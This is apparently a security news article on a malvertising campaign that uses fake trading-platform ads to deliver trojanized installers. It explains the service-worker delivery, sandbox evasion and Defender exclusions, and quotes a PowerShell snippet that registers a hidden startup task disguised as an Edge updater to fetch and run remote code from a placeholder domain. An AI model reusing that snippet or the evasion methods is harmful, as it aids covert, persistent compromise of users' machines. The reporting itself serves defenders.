Threat Actors Weaponizing Facebook and Google Ads as Financial Platforms to Steal Sensitive Data


In recent months, cybersecurity teams have observed an alarming trend in which malicious actors exploit Facebook and Google advertising channels to masquerade as legitimate financial services.

By promoting free or premium access to well-known trading platforms, these threat actors have successfully lured unsuspecting users into downloading trojanized applications.

The campaign’s social engineering tactics leverage familiar branding and verified badges, creating a veneer of authenticity that bypasses casual scrutiny.

Victims are redirected through paid ad placements toward obfuscated payloads designed to evade automated analysis and human review.

Initial infections typically begin with clicks on Facebook Ads promising “one-year free access” to premium charting tools.

Users are directed to landing pages that register a custom service worker. The installer is stored encrypted (AES-CBC) rather than as a plain download, and after decryption in the browser it is written to disk through StreamSaver.js under the name of a legitimate-looking executable.


Once downloaded, the oversized loader, sometimes over 700 MB, runs anti-sandbox checks and refuses to execute in virtualized environments. Inflating the file to that size also pushes it past the upload limits of many sandboxes and cloud scanners, so the sample is often never analysed at all. Only after these checks pass does the downloader start its multi-stage process.

Bitdefender analysts noted that once those checks are passed, the malware shifts to a WebSocket command channel on port 30000, replacing the HTTP-based approach used in previous campaigns.

The threat actors encrypted their front-end JavaScript, then deployed a deobfuscation routine at runtime to construct the final payload.

This dynamic approach foils most static analysis tools and significantly increases the complexity of forensic investigations.

Successful execution registers a persistent Scheduled Task named EdgeResourcesInstallerV12-issg, which downloads the next PowerShell stage and runs it in memory through Invoke-Expression.

Because the task fires at every system start and fetches the script afresh each time, the infection survives reboots and the operators can swap later stages without touching the host. The script also adds Windows Defender exclusions for its payload directories so that subsequent stages are not scanned.

The following excerpt, with a placeholder domain and comments added, illustrates how such a task is registered:-

# Hidden window, no profile; the response body is piped straight into Invoke-Expression. Single quotes keep $(...) literal, so it is evaluated by the child powershell.exe at each start, not at registration time.
$action = New-ScheduledTaskAction -Execute 'powershell.exe' -Argument '-NoProfile -WindowStyle Hidden -Command "Invoke-Expression $(Invoke-WebRequest -UseBasicParsing https://malicious-domain.com/next.ps1)"'
# Startup trigger is what carries the infection across reboots.
$trigger = New-ScheduledTaskTrigger -AtStartup
# Task name and description imitate a Microsoft Edge component to survive a casual look at Task Scheduler.
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName 'EdgeResourcesInstallerV12-issg' -Description 'Windows Edge resources updater'

Infection Mechanism

The infection mechanism centers on a sophisticated downloader component that leverages both service worker APIs and modern web tracking frameworks to blend malicious operations with legitimate analytics.

Malicious process (Source – Bitdefender)

By integrating PostHog for event tracking alongside third-party pixels such as Facebook Pixel, Google Ads Conversion Tracking, and Microsoft Ads Pixel, the front-end application gains visibility into user behavior.

This telemetry lets the operators serve the malicious download only to visitors who match their targeting profile, while everyone else receives a benign page, which also keeps the payload away from casual visitors and automated review.

Once the user initiates a download, the service worker intercepts the request, decrypts and deobfuscates the payload, and streams the binary through StreamSaver.js to the file system. The executable is assembled client-side from decrypted chunks, so it never appears as a plain HTTP response that URL-reputation or network inspection controls could examine or block.

This seamless delivery mechanism, paired with domain rotation and language-specific ads, enables rapid, widespread propagation while maintaining a low profile.


About Cybernoz

Security researcher and threat analyst with expertise in malware analysis and incident response.